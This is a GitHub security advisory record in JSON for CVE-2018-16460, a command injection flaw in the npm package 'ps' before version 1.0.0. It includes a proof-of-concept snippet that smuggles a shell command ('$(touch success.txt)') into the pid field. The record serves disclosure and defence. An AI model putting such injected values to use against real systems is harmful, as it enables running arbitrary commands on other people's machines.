{ "schema_version": "1.4.0", "id": "GHSA-cfhg-9x44-78h2", "modified": "2023-09-11T18:21:34Z", "published": "2018-09-17T20:43:59Z", "aliases": [ "CVE-2018-16460" ], "summary": "ps Enables OS Command Injection", "details": "Versions of `ps` before 1.0.0 are vulnerable to command injection.\n\n### Proof of concept:\n```js\nvar ps = require('ps');\n\nps.lookup({ pid: \"$(touch success.txt)\" }, function(err, proc) { // this method is vulnerable to command injection\n if (err) {throw err;}\n if (proc) {\n console.log(proc); // Process name, something like \"node\" or \"bash\"\n } else {\n console.log('No such process');\n }\n});\n\n// Result: The file success.txt will exist on the filesystem if the touch command was executed\n```\n\n\n## Recommendation\n\nUpdate to version 1.0.0 or later.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "affected": [ { "package": { "ecosystem": "npm", "name": "ps" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ] } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16460" }, { "type": "WEB", "url": "https://hackerone.com/reports/390848" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-cfhg-9x44-78h2" }, { "type": "WEB", "url": "https://github.com/nodejs/security-wg/blob/master/vuln/npm/470.json" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/728" } ], "database_specific": { "cwe_ids": [ "CWE-77", "CWE-78" ], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:31:20Z", "nvd_published_at": null } }